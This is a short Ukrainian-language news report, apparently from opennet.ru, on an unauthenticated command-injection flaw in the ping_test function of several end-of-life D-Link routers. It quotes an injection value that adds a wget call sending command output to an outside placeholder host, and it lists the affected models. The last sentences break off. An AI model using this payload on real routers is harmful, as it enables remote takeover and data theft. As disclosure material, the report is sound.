У бездротових маршрутизаторах D-Link
Цікаво, що за задумом розробників прошивки виклик "ping_test" повинен виконуватися тільки після аутентифікації, але насправді він викликається у будь-якому випадку, незалежно від входу до web-інтерфейсу. Зокрема, при зверненні до скрипту apply_sec.cgi з передачею параметра action = ping_test, скрипт перекидає на сторінку аутентифікації, але при цьому виконує пов'язану з ping_test дію. Для виконання коду використано ще одну вразливість у самому ping_test, який викликає утиліту ping без належної перевірки коректності переданої для тестування IP-адреси. Наприклад, для виклику утиліти wget та передачі на зовнішній хост результатів виконання команди «echo 1234» достатньо вказати параметр «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)».
Наявність уразливості офіційно підтверджено у моделях:
- DIR-655 з прошивкою 3.02b05 або старше;
- DIR-866L з прошивкою 1.03b04 або старше;
- DIR-1565 з прошивкою 1.01 або старше;
- DIR-652 (даних про версії проблемних прошивок не наводиться)
Час супроводу даних моделей вже минув, тому компанія D-Link
Пізніше з'ясувалося, що вразливість також
Джерело: opennet.ru